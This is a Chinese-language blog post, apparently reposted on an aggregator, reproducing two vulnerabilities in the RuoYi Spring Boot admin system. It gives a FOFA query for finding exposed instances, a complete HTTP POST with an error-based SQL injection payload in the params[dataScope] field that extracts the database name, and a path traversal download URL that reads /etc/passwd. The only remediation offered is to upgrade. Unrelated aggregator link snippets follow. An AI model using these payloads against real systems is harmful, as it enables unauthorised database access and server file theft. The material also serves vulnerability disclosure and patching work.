2. 程式人生 > 其它 >若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞

若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞

阿新 發佈:2021-08-03

0x00若依介紹

若依可以用於所有的Web應用程式,如網站管理後臺,網站會員中心,CMS,CRM,OA。所有前端後臺程式碼封裝過後十分精簡易上手,出錯概率低。同時支援移動客戶端訪問。系統會陸續更新一些實用功能。
寓意:你若不離不棄,我必生死相依

0x01漏洞描述

若依管理系統是基於SpringBoot的許可權管理系統,後臺存在sql注入、任意檔案下載漏洞,可以讀取資料庫、伺服器上的任意檔案內容。

0x02FOFA

app=”若依-管理系統”

0x03漏洞復現

SQL注入

這是個後臺洞,所以需要進入到後臺嚶嚶嚶


漏洞位置在”系統管理”裡中的”角色管理中”
http://xxxxxxx/system/role/list

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

POST /system/role/list HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=dea10cdb-9d3c-4f6a-854a-ea1ca540a992
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

成功利用報錯注入拿到資料資料庫名稱

任意檔案下載

影響版本:RuoYi < v4.5.1

登入後臺後直接訪問以下url即可下載檔案

http://xxx/common/download/resource?resource/profile/../../../../etc/passwd

0x04漏洞修復

更新升級到最新版本

轉載請註明:Adminxe's Blog»若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞

相關推薦

Ruoyi管理系統後臺sql注入+任意檔案下載漏洞

0x00若依介紹 若依可以用於所有的Web應用程式,如網站管理後臺,網站會員中心,CMS,CRM,OA。所有前端後臺程式碼封裝過後十分精簡易上手,出錯概率低。同時支援移動客戶端訪問。系統會陸續更新一些實用功能。寓意

65.畢業設計論文管理系統

65.畢業設計論文管理系統 GraduationProjectThesisManagementSystem 群: 123300273(大佬群 2TB學習資料,講解)(入群獲取sql檔案)

基於jsp的資料查詢web系統學生成績管理系統

目錄一、準備工作二、步驟三、成果展示 一、準備工作 本次任務所用到的有idea2017、Mysql5.8、SQLyog、jdk11.09

軟考筆記高階系統架構師/分析師:軟體工程與專案管理

目錄 軟考官網 報名通道 軟考架構師筆記:計算機系統基礎 軟考架構師筆記:計算機網路基礎與資訊保安

軟考中級系統整合專案管理 資訊化知識4資訊系統整合及服務管理、軟體工程

1、資訊系統整合及服務管理 1)資訊系統整合及服務管理體系內容: ① 資訊系統整合、運維服務和資訊系統監理資質管理

RDBMS關係資料庫管理系統術語

在我們開始學習MySQL 資料庫前,讓我們先了解下RDBMS的一些術語: 資料庫: 資料庫是一些關聯表的集合。

RDBMS 術語關係資料庫管理系統Relational Database Management System

RDBMS 術語 資料庫: 資料庫是一些關聯表的集合。 資料表: 表是資料的矩陣。在一個數據庫中的表看起來像一個簡單的電子表格。

HBase 系列—— HBase 系統架構及資料結構

一、基本概念 一個典型的 Hbase Table 表如下: 1.1 Row Key (行鍵) Row Key 是用來檢索記錄的主鍵。想要訪問 HBase Table 中的資料,只有以下三種方式:

eggjs搭建後端部落格系統,記錄解決sql事務問題

廢話部分 該專案git地址:https://github.com/ht-sauce/dream-admin 慣例:個人的廢話部分

常見繞過disable_function抄錄linux系統。windows系統大概只有com元件

為了安全,運維人員會禁用PHP的一些“危險”函式,將其寫在php.ini配置檔案中,就是我們所說的disable_functions了。例如:

MSSQL系列 系統函式之字串函式

1.ascii() :返回ascii碼 --返回ascii碼 select ascii(\'a\') go 2.char() :返回ascii對應的字元 --返回ascii對應的字元

MSSQL系列 系統函式之日期和時間函式

1.current_timestamp :獲取資料庫系統時間戳 --獲取資料庫系統時間戳 select current_timestamp

Linux基礎-23服務service管理

尚矽谷韓順平推薦:https://www.bilibili.com/video/BV1dW411M7xL?from=search&seid=8072051292168114337

系統辨識系統辨識的經典方法

根據需要,可經過適當的數學處理,這些非引數模型可以轉換成引數模型如傳遞函式,在工程上經常採用這類方法,經典辨識方法只限於單輸入單輸出線性定常最小相位系統。實驗曲線表徵了系統的特性。

系統辨識系統辨識的最小二乘法基礎

一、最小二乘法的基本原理 在研究分析的過程中,經常要對一些研究物件構建數學模型來進行分析。通常在建模過程中有機理法建模和通過資料驅動的方式建模。因此怎樣確定系統的數學模型及引數———即系統辨識

容器管理 Machine【42】

)管理 Machine 用 docker-machine 建立 machine 的過程很簡潔,非常適合多主機環境。除此之外,Docker Machine 也提供了一些子命令方便對 machine 進行管理。其中最常用的就是無需登入到 machine 就能執行 dock

Flink實戰102:配置管理配置

來源:http://www.54tianzhisheng.cn/2019/03/28/flink-additional-data/ 前言 如果你瞭解 Apache Flink 的話,那麼你應該熟悉該如何像 Flink 傳送資料或者如何從 Flink 獲取資料。但是在某些情況下,我們需要將配置

框架的選單管理中增加詳情頁

技術標籤:前端學習筆記vue.jsRuoyi Ruoyi 框架生成程式碼時,各種資料操作都放在一個 dialog 彈出框中,而且只有編輯,沒有檢視……這很不方便。很多時候我們需要個詳情頁只讀,對於複雜實體在新建時,那個

探索無人機使用方式,民航局印發《民用無人駕駛航空試驗基地試驗區管理辦法》

3 月 10 日訊息 民航局近日印發《民用無人駕駛航空試驗基地試驗區管理辦法》。

macOS 下使用命令列進行使用者管理,就是這麼簡單! dscl 你很有必要了解一下!!

大家好,我是@小猿來也... Command-line interface to Directory Services。 在 linux 系統中我們習慣了使用 useradd,userdel,usermod 等指令進行使用者管理,使用 groupadd,groupdel,groupmod 等指令進行使用者組